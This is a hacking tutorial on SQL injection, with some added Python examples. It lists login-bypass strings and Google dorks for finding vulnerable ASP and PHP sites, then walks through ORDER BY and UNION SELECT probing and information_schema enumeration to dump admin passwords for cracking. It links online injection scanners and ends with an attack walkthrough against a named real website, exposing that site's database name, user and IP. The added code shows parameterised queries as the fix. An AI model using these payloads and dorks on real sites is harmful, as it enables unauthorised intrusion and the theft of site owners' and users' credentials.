[ SQL INJECTION TUT ]

-----------------------------------------------------------

SQL = Structured Query Language

-----------------------------------------------------------

SQL INJECTION = Injecting SQL of your own into a query that a web application builds from user input, so the database runs your SQL instead of (or as well as) the application's. Two common uses are bypassing a login to get in as admin and reading data straight out of the database.

-----------------------------------------------------------

..::BASIC SQL INJECTION::..

Auth Bypass. Classic ASP login pages were a very common target for this. The method is old, but many websites are still vulnerable to it.


First we need to find a site. Start by opening Google and searching with dorks.

Definition of dork: a search query crafted to turn up a certain type of site, page or exploitable feature.

There are many dorks. Some are below:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Type any of the above dorks into Google and start going through the results (you will get many websites).
The admin control panel will ask for a username and password.

We will use our SQL injections there.
A list of a few injection strings is given below:

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

If that list looks confusing: in the simplest case your input should look like this:

Username : Admin
Password : 'or'1'='1

What happens is that the first quote closes the password string the page was building, the or '1'='1 part is true for every row, and because AND binds tighter than OR the whole WHERE clause now matches every user in the table. The login query returns a row, so the site thinks you logged in.

So click submit and you're in.
NOTE: not all sites are vulnerable. If the site escapes quotes or uses bound parameters, none of these strings will work.
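An added example, not code from the original tutorial, showing why the `'or'1'='1` password works and what the fix looks like. It builds a throwaway SQLite database in memory with a constructed users table, then runs the same login check two ways: the string-concatenated query that old ASP/PHP login pages used (the bug this section exploits) and a parameterised query that is immune. SQLite is used only so the example runs offline; the user table, the sample credentials and the function names are all assumptions.

```python
"""Added example: login bypass with 'or'1'='1 against a string-built query,
and the same check done with bound parameters. Not from the tutorial."""
import sqlite3

# Constructed sample data: nobody knows these passwords except the DB.
SAMPLE_USERS = [("admin", "h4rd-t0-gu3ss"), ("alice", "Spring2011!")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


def build_vulnerable_query(username, password):
    # The bug: user input is pasted straight into the SQL text, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    """Returns the username the DB matched, or None. Mirrors a classic ASP login."""
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same check with bound parameters: the input is data and can never be SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "'or'1'='1"   # the password the tutorial tells you to type
    print(build_vulnerable_query("Admin", payload))
    # WHERE username = 'Admin' AND password = '' OR '1'='1' is true for every row,
    # so the first user in the table (admin) comes back.
    print("vulnerable login ->", login_vulnerable(db, "Admin", payload))
    print("safe login       ->", login_safe(db, "Admin", payload))
    # Comment-style payloads from the list above work the same way:
    print("vulnerable login ->", login_vulnerable(db, "' or 1=1--", "anything"))
```

The `' or 1=1--` variant shows the other trick in the list above: everything after `--` (including the real password check) becomes a comment. On MySQL the comment needs a space after `--`; `#` also works there but not on SQLite or MSSQL.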


-------------------------------------------------------------


SQL Injection Queries to Extract The Information from Website

OK, so let's say we have a site:
http://www.yourtargetwebsitex.com/index.php?catid=1
There is a list of dorks for finding sites like this:

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=

Note: these are just a few dorks, as examples.
You can also narrow a dork to one target with site:, like this:

inurl:".php?catid=" site:xxx   (in place of xxx you put your target domain, for example inurl:".php?catid=" site:direct.gov.uk)

So once you have your site:

http://www.yourtargetwebsite.com/index.php?catid=1

add a ' to the end of the URL, so it becomes:

http://www.yourtargetwebsite.com/index.php?catid=1'

If the page now shows a database error (or its content changes noticeably), the catid value is being pasted straight into the query and the page is very likely injectable. No error does not prove it is safe: many sites hide errors, and those need blind techniques that are not covered here.

Now we need to find the number of columns in the query the page runs (not in the whole database). ORDER BY n sorts by the n-th column of the result, so it errors as soon as n is larger than the number of columns the query selects:

http://www.yourtargetwebsite.com/index.php?catid=1 order by 1-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 2-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 3-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 4-- "no error"
http://www.yourtargetwebsite.com/index.php?catid=1 order by 5-- "error"

So this query selects 4 columns, because we got an error on 5.
Some queries select 2 columns and some 200; it varies.

Once we have the column count, we try UNION SELECT. Give the page an id that does not exist (catid=-1) so the only row it renders is the one we add, and put a different number in each column:

http://www.yourtargetwebsite.com/index.php?catid=-1 union select 1,2,3,4-- "or whatever number of columns the query has"

If you see some of the numbers 1 2 3 4 on the screen, the union worked. It usually will not show all of them: the numbers that do appear are the columns the page prints, and those are the ones you replace to extract data from the DB.

Now we need information about the DB. Let's say the numbers 2 and 4 showed up on the screen, so we put our query in column 2:

http://www.yourtargetwebsite.com/index.php?catid=-1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--

CHAR(32,58,32) is just " : " written as character codes (handy when the site filters quotes), so the DB user, database name and version show up on the page separated by colons.
What you do next depends on the version you just saw, because the table holding the admin login is different on every site.

If the version is 5.0 or higher, MySQL has the information_schema database, which lists every table and column on the server, and you can read it through the injection. To go straight for password-looking columns:

http://www.yourtargetwebsite.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema),3,4 from information_schema.columns where column_name like CHAR(37,112,97,115,37)--

CHAR(37,112,97,115,37) is "%pas%", so this lists every column whose name contains "pas", together with its table and database. That normally gives you the table containing the admin username and password. To list all tables instead:

http://www.yourtargetwebsite.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

A page normally prints only one row, so you only see the first result. Either step through them with LIMIT 0,1 then LIMIT 1,1 and so on, or use group_concat(table_name) in place of table_name to get them all in one cell, and add where table_schema=database() to skip MySQL's own system tables.

If the version is 4.x or lower there is no information_schema, so you have to guess the table name (admin, admins, users, members, tbl_admin ...) and the column names (username, user, login, password, pass, passwd ...) until the query stops erroring.

Once you have your table name (found or guessed), type:

http://www.yourtargetwebsite.com/index.php?catid=-1 UNION SELECT 1,password,3,4 FROM admintablename--

where admintablename is the table you found with the information_schema.columns query above (or your guess).
With the right table name you get the administrator's password; then do the same thing with username instead of password.
Often the password is hashed and you need to crack it.
There are many MD5 crackers.
Next you want to find the admin panel; usually it is:

www.yourtargetsite.com/admin OR /administrator

If it does not work at all, play around with the little things: catid=1 or catid=-1, and instead of -- try /* or even nothing.
MySQL only treats -- as a comment when whitespace follows it, so if the application appends anything after your input (a closing quote, for example) a bare -- is not a comment and the query errors; --+ (the + becomes a space in the URL) or -- - fixes that, and /* opens a comment the same way.
Sometimes we also need version() or @@version in one of the visible columns, for example:

UNION SELECT version(),password,3,4 FROM admintable--
or UNION SELECT @@version,password,3,4 FROM admintable--
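The ORDER BY / UNION SELECT procedure above, automated as an added example that is not part of the original tutorial. There is no live target: `render_page` plays the part of the vulnerable index.php?catid=N, pasting the parameter into an unquoted numeric WHERE clause and returning either the rendered rows or the database error text, the same two signals the tutorial reads off the screen. SQLite (in memory) stands in for MySQL, so the schema is read from `sqlite_master` rather than `information_schema.tables` and strings are joined with `||` rather than `concat()`; the probing logic is otherwise identical. The table names, columns, credential and function names are all constructed for the example.

```python
"""Added example: column counting, visible-column discovery and data extraction
through a UNION-based injection, run against a stand-in page. Not from the tutorial."""
import sqlite3


def make_target():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, catid INTEGER, title TEXT, body TEXT)")
    db.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO news VALUES (1, 1, 'Welcome', 'First post')")
    # Constructed credential; the hash is md5('secret'), stored unsalted the way
    # the old PHP apps this tutorial targets usually did.
    db.execute("INSERT INTO admin VALUES (1, 'admin', '5ebe2294ecd0e0f08eab7690d2a6ee69')")
    return db


def render_page(db, catid):
    """Stand-in for index.php: a 4-column SELECT with the parameter unquoted."""
    sql = "SELECT id, catid, title, body FROM news WHERE catid = " + catid
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as e:
        return "ERROR: " + str(e)          # what a site with errors displayed shows
    # Only title and body reach the HTML: the "visible" columns of the tutorial.
    return "\n".join(" | ".join(str(c) for c in (r[2], r[3]) if c is not None)
                     for r in rows)


def count_columns(page, limit=100):
    """ORDER BY n until the page errors; the last n that worked is the column count."""
    for n in range(1, limit + 1):
        if page("1 ORDER BY %d--" % n).startswith("ERROR"):
            return n - 1
    return None                               # more than `limit` columns, or errors hidden


def visible_columns(page, ncols):
    """UNION a row of marker strings; the markers that render are the printable columns."""
    markers = ",".join("'COL%d'" % i for i in range(1, ncols + 1))
    out = page("-1 UNION SELECT %s--" % markers)   # -1: no real row, only ours
    return [i for i in range(1, ncols + 1) if ("COL%d" % i) in out]


def extract(page, ncols, col, expr, from_clause=""):
    """Put `expr` in visible column `col` and NULL everywhere else."""
    cells = ["NULL"] * ncols
    cells[col - 1] = expr
    return page("-1 UNION SELECT %s%s--" % (",".join(cells), from_clause))


def list_tables(page, ncols, col):
    # MySQL 5+ equivalent: group_concat(table_name) FROM information_schema.tables
    #                      WHERE table_schema=database()
    return extract(page, ncols, col, "group_concat(name)",
                   " FROM sqlite_master WHERE type='table'")


def dump_column(page, ncols, col, table, column):
    """All values of one column in one cell, so a one-row page still shows them all."""
    return extract(page, ncols, col, "group_concat(%s)" % column, " FROM " + table)


if __name__ == "__main__":
    db = make_target()
    page = lambda catid: render_page(db, catid)
    print("quote test:", page("1'")[:40])
    n = count_columns(page)
    vis = visible_columns(page, n)
    print("columns:", n, "visible:", vis)
    print("tables:", list_tables(page, n, vis[0]))
    print("admin:", dump_column(page, n, vis[0], "admin", "username||':'||password"))
```

Two details worth noticing: the marker row uses strings rather than the bare numbers in the tutorial, so a page that prints record ids cannot be confused with the marker, and every extraction query uses `-1` so the real record is never returned alongside the injected one.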

-----------------------------------------------------------

For ease, you can download HackBar, a Firefox add-on that makes building and URL-encoding your injection queries easier.

Download it at:

https://addons.mozilla.org/en-US/firefox/addon/hackbar/


-----------------------------------------------------------

To find the admin panel you can also use this online admin finder:

http://tools.th3-0utl4ws.com/admin-finder/

-----------------------------------------------------------


There was a program known as Exploit Scanner, coded by "Reliuke"; it is patched now and no longer works.

But there are online scanners which find SQL-injectable sites for you.
A few are given below:

http://webhosting.blackoutaio.com/~sqli/

SQLi Scanner

If you want to hack a specific target website rather than a random one, you can also point these online tools at it: they work like a website search driven by a dork.

Example:

Say you want to hack the website Primus Camping,

and you want to find an SQL error in it first (once you have the error, you can exploit it).
Just do the following:

in your online SQL scanner, i.e.

http://webhosting.blackoutaio.com/~sqli/

type your dork together with the target website:

inurl:php?=id+site:primuscamping.com


Invalid Query: select * from item where item_id = \'3 Error is: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'3' at line 1


and you've got it: the site has a hole ===>

Pages: [ 0 ]
Dork: [ inurl:php?=id+site:primuscamping.com ]
Scanning Google
Loadiing…
Primus Camping <== SQL Injection Success !

Read the error carefully before injecting, because it tells you how your input sits in the query. Here the parameter is used unquoted (item_id = \'3) and the site has backslash-escaped the quote (addslashes or magic_quotes), yet the query still broke: it is a numeric injection point, so inject straight into the number with no quotes, exactly as the catid=-1 UNION SELECT examples above do. A leaked error is strong evidence, but only a working ORDER BY / UNION proves the hole.

So you can go on to inject your target.
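The check an online SQLi scanner performs when it reports "SQL Injection Success", as an added example that is not code from the tutorial or from the scanner linked above: append a quote to the parameter, fetch the page, and look for a database error message in what comes back. The responses below are constructed sample strings (the first is the Primus Camping error text shown above); nothing is fetched from the network, and the signature list is an assumed starting set, not an exhaustive one.

```python
"""Added example: error-based SQL injection detection over page bodies, plus a
check for backslash-escaped quotes. Not from the tutorial or the linked scanner."""
import re

# Fragments that only a DBMS or DB driver emits. Assumed set; extend as needed.
ERROR_SIGNATURES = [
    r"You have an error in your SQL syntax",                 # MySQL
    r"Warning: mysql_fetch_",                                # PHP mysql_* after a failed query
    r"supplied argument is not a valid MySQL",               # PHP mysql_* after a failed query
    r"Unclosed quotation mark after the character string",   # MSSQL
    r"Microsoft OLE DB Provider for (?:ODBC|SQL Server)",    # classic ASP / MSSQL
    r"ORA-\d{5}",                                            # Oracle
    r"PG::SyntaxError|pg_query\(\)",                         # PostgreSQL
    r"SQLite3::query|unrecognized token",                    # SQLite
]
_SIG = re.compile("|".join("(?:%s)" % s for s in ERROR_SIGNATURES), re.I)

# Constructed sample responses to catid=3' style probes.
SAMPLE_RESPONSES = {
    "primus": ("Invalid Query: select * from item where item_id = \\'3 Error is: "
               "You have an error in your SQL syntax; check the manual that corresponds "
               "to your MySQL server version for the right syntax to use near '\\'3' at line 1"),
    "asp": ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14' "
            "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark "
            "after the character string ''."),
    "clean": "<html><body><h1>Item 3</h1><p>Nothing to see here.</p></body></html>",
}


def sql_error_in(body):
    """Return the error signature found in the page body, or None if it looks clean."""
    m = _SIG.search(body)
    return m.group(0) if m else None


def quotes_escaped(body):
    """True if the echoed query shows \\' : the site escapes quotes (addslashes or
    magic_quotes), so a quote is useless there and you inject into unquoted numbers."""
    return re.search(r"\\'", body) is not None


def scan(responses):
    """Map each page name to the signature that fired (None means no error leaked)."""
    return {name: sql_error_in(body) for name, body in responses.items()}


if __name__ == "__main__":
    for name, sig in scan(SAMPLE_RESPONSES).items():
        print("%-7s %-45s quotes escaped: %s"
              % (name, sig, quotes_escaped(SAMPLE_RESPONSES[name])))
```

A hit means the site leaks database errors and puts your input into a query; a miss means only that it does not leak errors, which is why a real scan follows up with ORDER BY and UNION probes rather than trusting the absence of a signature.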

-----------------------------------------------------------
Inj3ct1ng...

[screenshot: Primus Camping]

No error

[screenshot: Primus Camping]

0_o Error means it has 31 columns...

Further, by UNION function:

[screenshot: Primus Camping]

OK, here I see vulnerable columns "5", 10... 0_o, so I am gonna fuck "10".

Knowing basic information:

[screenshot: Primus Camping]

The information I get is:

db116472@205.186.176.14 : nagear_com_-_main : 5.1.26-rc-5.1.26rc

MySQL version : 5.1
Database : nagear_com_-_main
User : db116472@205.186.176.16

Inj3ct1ng further.... 0_o

[screenshot: Primus Camping]
Tables ^^

[screenshot: Primus Camping]